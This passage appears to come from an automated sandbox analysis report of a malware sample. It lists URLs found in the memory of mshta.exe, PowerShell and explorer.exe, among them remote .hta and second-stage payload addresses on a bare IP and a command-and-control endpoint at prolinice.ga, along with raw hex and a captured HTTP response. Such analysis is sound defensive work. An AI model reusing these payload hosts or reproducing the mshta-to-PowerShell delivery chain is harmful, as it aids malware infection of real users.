9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 17:22:58 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
          Source: mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487347079.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482683098.0000000003C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/
          Source: mshta.exe, 00000005.00000003.423343761.000000000287D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423453903.000000000287E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.421467560.00000000003D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.00000000003D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424122404.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.0000000000370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.421467560.0000000000371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423461007.0000000002880000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426639453.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.00000000003D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.0000000000371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423310092.000000000323A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.478065149.0000000003170000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
          Source: mshta.exe, 00000005.00000003.421467560.0000000000386000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487556654.00000000000FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta.
          Source: mshta.exe, 00000005.00000003.421467560.00000000003D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.00000000003D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.00000000003D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta3
          Source: mshta.exe, 00000005.00000003.423322872.0000000000370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.421467560.0000000000371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta7
          Source: mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487590703.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487491030.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.000000000015F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaC
          Source: mshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaM
          Source: mshta.exe, 00000011.00000002.488032754.0000000004970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htac
          Source: mshta.exe, 00000005.00000003.424122404.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426639453.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423310092.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htae
          Source: mshta.exe, 00000005.00000003.423293485.0000000002875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486546130.0000000003165000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482417273.0000000003165000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htah
          Source: mshta.exe, 00000005.00000003.421467560.00000000003D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htau
          Source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybe
          Source: powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF
          Source: powershell.exe, 00000006.00000002.454017233.000000001A8CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF=
          Source: powershell.exe, 00000006.00000002.454017233.000000001A8CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFa
          Source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFp
          Source: powershell.exe, 00000013.00000002.509085075.000000001AC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFs
          Source: powershell.exe, 00000013.00000002.509085075.000000001AC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~
          Source: mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.178/fW~(
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BDA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: powershell.exe, 00000006.00000002.454017233.000000001A832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
          Source: powershell.exe, 00000006.00000002.447990130.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
          Source: explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
          Source: explorer.exe, 00000026.00000002.601139642.0000000000614000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.573733607.000000000036E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.580498060.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.624702366.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
          Source: explorer.exe, 00000026.00000002.601139642.0000000000614000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.573733607.000000000036E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.580498060.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.624702366.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
          Source: explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
          Source: powershell.exe, 00000006.00000002.447990130.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.511129884.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.0000000001F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.560114781.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
